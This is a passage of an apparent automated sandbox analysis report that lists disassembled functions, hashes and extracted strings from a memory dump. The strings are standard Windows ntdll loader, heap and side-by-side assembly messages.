                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                  • API String ID: 0-4009184096
                                                                  • Opcode ID: 2478a79844f0e067158a8ec65e796e262cb80fe9ebe86b97e50dda0320e066ba
                                                                  • Instruction ID: c2a1732ac9a0f7517bdb6c4558ca02bbf24d2189d39e975171247d871cf68704
                                                                  • Opcode Fuzzy Hash: 2478a79844f0e067158a8ec65e796e262cb80fe9ebe86b97e50dda0320e066ba
                                                                  • Instruction Fuzzy Hash: 09028FB1D002299BEF31DB54CC90B9EB7B8BB55704F1041DAE609AB251EB709F84CF69
                                                                  Function 01548B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                  • API String ID: 0-2515994595
                                                                  • Opcode ID: ce479c92ea8d198b1ec215ed8566ab7723089919ebb80bb82363e5906ea36451
                                                                  • Instruction ID: 22d1dcfa56d317b8918360c9cef4ca587fc48ad00235cfa6b3bf73e81592caca
                                                                  • Opcode Fuzzy Hash: ce479c92ea8d198b1ec215ed8566ab7723089919ebb80bb82363e5906ea36451
                                                                  • Instruction Fuzzy Hash: 1651F0715053019BD725CF59C848BABBBE8FF94358F58092EE999CB250E770E608C792
                                                                  Function 01550274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                  • API String ID: 0-1700792311
                                                                  • Opcode ID: 2e4bcfff9d306a00752ee4ab30ea3940f42a83f5658669c2961f937167c136c6
                                                                  • Instruction ID: a07452ce7f89f6ca49872ea0b3315f9ab7daf10fa2f54500460d7be190806f17
                                                                  • Opcode Fuzzy Hash: 2e4bcfff9d306a00752ee4ab30ea3940f42a83f5658669c2961f937167c136c6
                                                                  • Instruction Fuzzy Hash: C3D1EA31600286DFDB62DF69C460AAEBFF1FF5A704F19804AF8459F2A2C7349981CB11
                                                                  Function 015289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01528B8F
                                                                  • VerifierDebug, xrefs: 01528CA5
                                                                  • VerifierFlags, xrefs: 01528C50
                                                                  • HandleTraces, xrefs: 01528C8F
                                                                  • VerifierDlls, xrefs: 01528CBD
                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01528A3D
                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01528A67
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                  • API String ID: 0-3223716464
                                                                  • Opcode ID: 39e8e2a671b8e46b1c96405224508c3920fd9df5d6d9889a7c20fdfa6d343a58
                                                                  • Instruction ID: 70a1b087c43ab8cd5283c30841a96ad1a91f4ff01482d0b31fcf8d938be0dbff
                                                                  • Opcode Fuzzy Hash: 39e8e2a671b8e46b1c96405224508c3920fd9df5d6d9889a7c20fdfa6d343a58
                                                                  • Instruction Fuzzy Hash: 579138736053229FDB22DFA8C880B1E77E4FB96B14F46085EFA406F290D7709818C796
                                                                  Function 014AEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                  • API String ID: 0-1109411897
                                                                  • Opcode ID: cf4cffc2a9ec393ea0a9314cc2a9d3fdcf95612ad979345cb029fa4338d28aec
                                                                  • Instruction ID: 67f313f59be3dffa2246ce01257aa25f61522889fd4fa1b00ab282747586e986
                                                                  • Opcode Fuzzy Hash: cf4cffc2a9ec393ea0a9314cc2a9d3fdcf95612ad979345cb029fa4338d28aec
                                                                  • Instruction Fuzzy Hash: 0BA25D74A0562A8BDB65CF58CC887AEBBB5BF55300F5542EAD50DA73A0DB309E85CF00
                                                                  Function 014D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-792281065
                                                                  • Opcode ID: e191379bf3fed20c06d2a10721833766ca6957a337c86e68e9feb429d7e9ea04
                                                                  • Instruction ID: 14533bf910bedcf7da275a986b5df3977d6fc6e3af0c58c7bc80d26f2af7da8c
                                                                  • Opcode Fuzzy Hash: e191379bf3fed20c06d2a10721833766ca6957a337c86e68e9feb429d7e9ea04
                                                                  • Instruction Fuzzy Hash: 4D914770A403129BFF36DF19D854BAE3BA1BB51B24F12012FE5206F2A9D7B48846C795
                                                                  Function 0149645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 014F9A11, 014F9A3A
                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 014F9A01
                                                                  • apphelp.dll, xrefs: 01496496
                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014F99ED
                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 014F9A2A
                                                                  • LdrpInitShimEngine, xrefs: 014F99F4, 014F9A07, 014F9A30
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-204845295
                                                                  • Opcode ID: bc279b9e7220cb5ac3888e7e4de892b88d98256adaa5ed1fcfcf8bfd493670fb
                                                                  • Instruction ID: fb88824b49cc1f49651b8dbefb44ae9a10b64df75972096766a31f6b85119f4b
                                                                  • Opcode Fuzzy Hash: bc279b9e7220cb5ac3888e7e4de892b88d98256adaa5ed1fcfcf8bfd493670fb
                                                                  • Instruction Fuzzy Hash: 3351D1716083419FEB25DF25D881FAB7BE4FB94648F12091FF6959B270D630E908CB92
                                                                  Function 014D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() passed the empty activation context, xrefs: 01512165
                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01512160, 0151219A, 015121BA
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01512180
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01512178
                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0151219F
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015121BF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                  • API String ID: 0-861424205
                                                                  • Opcode ID: c94525e7c91cd4f7d8c3bce0a03ebfba629181ce2694afdaa923edb23490b86a
                                                                  • Instruction ID: 4fb1bbc4033ed35ae0c98e949b5fe8e621c2303d81497987afee526a68e9205a
                                                                  • Opcode Fuzzy Hash: c94525e7c91cd4f7d8c3bce0a03ebfba629181ce2694afdaa923edb23490b86a
                                                                  • Instruction Fuzzy Hash: 14312B36F4022577FF22DA998C91F5F7B78EFA5A50F25005BFA04AB254D2B09E01C7A0
                                                                  Function 014DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 014DC6C3
                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 015181E5
                                                                  • LdrpInitializeImportRedirection, xrefs: 01518177, 015181EB
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01518181, 015181F5
                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01518170
                                                                  • LdrpInitializeProcess, xrefs: 014DC6C4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-475462383
                                                                  • Opcode ID: 274f89d3c1957d903a2992abf2b9667e2f8ee90ec572dc0a37f2bb44ba6d049d
                                                                  • Instruction ID: 9228738d3101afce417556f91b59268f25e8e8451a19039278afafea292f2a8a
                                                                  • Opcode Fuzzy Hash: 274f89d3c1957d903a2992abf2b9667e2f8ee90ec572dc0a37f2bb44ba6d049d
                                                                  • Instruction Fuzzy Hash: A63102726443029BD221EF29D886E2E7BD5FFA4B20F05055DF945AB3A1E670EC04C7A2
                                                                  Function 014E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 014E2DF0: LdrInitializeThunk.NTDLL ref: 014E2DFA
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0BA3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0BB6
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0D60
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0D74
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 1404860816-0
                                                                  • Opcode ID: ff57d8ea7521b702f856450718e48339ac3212ec32795b853c19e4179856cd89
                                                                  • Instruction ID: 2579d7c9c1146aaa73cc8ec389d1dc4c546eeb65eb6f418142fbd2580a974467
                                                                  • Opcode Fuzzy Hash: ff57d8ea7521b702f856450718e48339ac3212ec32795b853c19e4179856cd89
                                                                  • Instruction Fuzzy Hash: 05428C71A00705DFEB21CF28C884BAAB7F5FF04315F0445AAE999DB255D7B0AA85CF60
                                                                  Function 014AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                  • API String ID: 0-379654539
                                                                  • Opcode ID: 4ce6dd16af418cea8afe4a4bac20bf67d60b5de50501dbec6a4e8902ca4e8ce0
                                                                  • Instruction ID: 7f0be1b4b92a90b592f0330b88f8431a744625f078c8b1eb5fa1ab9836319c5b
                                                                  • Opcode Fuzzy Hash: 4ce6dd16af418cea8afe4a4bac20bf67d60b5de50501dbec6a4e8902ca4e8ce0
                                                                  • Instruction Fuzzy Hash: FAC1BC75108382CFD722CF58C144B6ABBE4BFA8704F55486EF9958B3A1E334C94ACB56
                                                                  Function 014D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 014D8421
                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 014D855E
                                                                  • @, xrefs: 014D8591
                                                                  • LdrpInitializeProcess, xrefs: 014D8422
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1918872054
                                                                  • Opcode ID: 2cb1fd4f6aaa7d84905f9f60aceb747eb0b491584bc44df087ed5028b822acd8
                                                                  • Instruction ID: 2b67b448bb2b38f1f945dfc011c8a64de85c20bfb3ac30b7d7268b10dafa0d7a
                                                                  • Opcode Fuzzy Hash: 2cb1fd4f6aaa7d84905f9f60aceb747eb0b491584bc44df087ed5028b822acd8
                                                                  • Instruction Fuzzy Hash: 3A918071558346AFEB22DF65CC60EBBBAECBF94644F40092FF68496161E370D904CB62
                                                                  Function 014D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015121D9, 015122B1
                                                                  • SXS: %s() passed the empty activation context, xrefs: 015121DE
                                                                  • .Local, xrefs: 014D28D8
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015122B6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                  • API String ID: 0-1239276146
                                                                  • Opcode ID: 58b37e3a82a8cdff978bda824cf96ae3a67624fd98beea848e42dfbfd1609056
                                                                  • Instruction ID: 9151c14b7fbd055d895cc0b840324a8f4bd675cb78cc9b0ed65e80f574d265cf
                                                                  • Opcode Fuzzy Hash: 58b37e3a82a8cdff978bda824cf96ae3a67624fd98beea848e42dfbfd1609056
                                                                  • Instruction Fuzzy Hash: 72A1D131A00229DBDF21CF59CC94BAAB7B1BF58314F2541EAD918AB361D7709E81CF90
                                                                  Function 014D4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RtlDeactivateActivationContext, xrefs: 01513425, 01513432, 01513451
                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0151342A
                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01513456
                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01513437
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                  • API String ID: 0-1245972979
                                                                  • Opcode ID: 8fb0178a6c2a60aaf06f8dc859f2a70125e4b4ae4b24045cce032e86c96aeaca
                                                                  • Instruction ID: 43e3b09b2174c970767b8f87aa9aa3a3d21e30cf68013b4de24a46c10293e635
                                                                  • Opcode Fuzzy Hash: 8fb0178a6c2a60aaf06f8dc859f2a70125e4b4ae4b24045cce032e86c96aeaca
                                                                  • Instruction Fuzzy Hash: 8A6147326407129BEB23CF1DC8A5B2AB7E0BF90B20F19851EE9559F764D770E801CB91
                                                                  Function 014A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01501028
                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0150106B
                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015010AE
                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01500FE5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                  • API String ID: 0-1468400865
                                                                  • Opcode ID: a1e947ff5af66960216a9da0ef9f0173511143a15d4264c466344d9dd1dd3967
                                                                  • Instruction ID: 56f85ae11095662588863e658f7c6fc1b04c91ab0a80567378a69c45cbe8fec8
                                                                  • Opcode Fuzzy Hash: a1e947ff5af66960216a9da0ef9f0173511143a15d4264c466344d9dd1dd3967
                                                                  • Instruction Fuzzy Hash: D97124B19043059FCB21DF15C884F9B7FA8AF65754F86046EF9888B2A6D334D588CBD2
                                                                  Function 014C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0150A9A2
                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0150A992
                                                                  • LdrpDynamicShimModule, xrefs: 0150A998
                                                                  • apphelp.dll, xrefs: 014C2462
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-176724104
                                                                  • Opcode ID: 4d5c5c35e3d67c4bf03c7834dd1074b21b02f6f4c75b606109b2ca7be95d3ed4
                                                                  • Instruction ID: ed869b2f05aba2cfd9be9d7b38350e577fb41a403b4ca72ed3b48ee5ce18dd12
                                                                  • Opcode Fuzzy Hash: 4d5c5c35e3d67c4bf03c7834dd1074b21b02f6f4c75b606109b2ca7be95d3ed4
                                                                  • Instruction Fuzzy Hash: AD312875600302EBDB329FA99985E6EB7B4FB80B04F17001EE9206F2A5C7F05986D781
                                                                  Function 014B29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • HEAP[%wZ]: , xrefs: 014B3255
                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 014B327D
                                                                  • HEAP: , xrefs: 014B3264
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                  • API String ID: 0-617086771
                                                                  • Opcode ID: 182d8d9ffef8409f3e024fa63e3a501ff3086a01561963ac5820c3f3a7aedc5c
                                                                  • Instruction ID: cdabc629ceebb15963003810b79267ddfac4fd6aca8a97a7e5430adcab96591d
                                                                  • Opcode Fuzzy Hash: 182d8d9ffef8409f3e024fa63e3a501ff3086a01561963ac5820c3f3a7aedc5c
                                                                  • Instruction Fuzzy Hash: 3492BC71A042499FDB25CF69C484BEEBBF1FF48310F18805AE859AB361D774A946CF60
                                                                  Function 014B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-4253913091
                                                                  • Opcode ID: 6da8d70f468ae612e2e72fe164fe259b317306c24a9411ba9c8eb218a470a0cb
                                                                  • Instruction ID: 337d178db3e2d2552e7f9632a6315ba5207139f79e477beccb7e1452df20d18a
                                                                  • Opcode Fuzzy Hash: 6da8d70f468ae612e2e72fe164fe259b317306c24a9411ba9c8eb218a470a0cb
                                                                  • Instruction Fuzzy Hash: D5F19E30600606DFEB26CFA8C894BAAB7F5FF44305F14416AE5569B3A1D734E981CFA1
                                                                  Function 014C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $@
                                                                  • API String ID: 0-1077428164
                                                                  • Opcode ID: 1dafc3caac26f121ce2d26d8d97d181dd75dcb4e9b488141cac1f911556a6808
                                                                  • Instruction ID: 597718af811d654a41b57a79cc22f7bbd23c0afa931ae92818784b816ba82299
                                                                  • Opcode Fuzzy Hash: 1dafc3caac26f121ce2d26d8d97d181dd75dcb4e9b488141cac1f911556a6808
                                                                  • Instruction Fuzzy Hash: B8C2C0756083418FE765CF69C880BABBBE5BF89B14F04892EE989C7361D734D805CB52
                                                                  Function 0149A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                  • API String ID: 0-2779062949
                                                                  • Opcode ID: 2fd31d8047dc6a958c935518db22b1016ebd0019ef0e5cba4a4094af7f51ad05
                                                                  • Instruction ID: 410d3389f268429538757ece49011f3e72642b078cd6cad245e0e0588962c295
                                                                  • Opcode Fuzzy Hash: 2fd31d8047dc6a958c935518db22b1016ebd0019ef0e5cba4a4094af7f51ad05
                                                                  • Instruction Fuzzy Hash: 9BA158759012299BDF319F28CC88BEAB7B8EF54714F1001EAEA08A7260D7759E85CF50
                                                                  Function 014C0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0150A121
                                                                  • Failed to allocated memory for shimmed module list, xrefs: 0150A10F
                                                                  • LdrpCheckModule, xrefs: 0150A117
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-161242083
                                                                  • Opcode ID: 7bf05317f01d21ed0855c937cf19708da827854eb80af6eb4582ac61111218f9
                                                                  • Instruction ID: b9d27f0800a81b908dd5bf31c795c656815e23240a262fe426d5a1f0b1ca83f5
                                                                  • Opcode Fuzzy Hash: 7bf05317f01d21ed0855c937cf19708da827854eb80af6eb4582ac61111218f9
                                                                  • Instruction Fuzzy Hash: 2D71E478A00306DFDB29DFA9C980ABEB7F4FB54604F16402EE4119B365E734A946CB51
                                                                  Function 014B0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
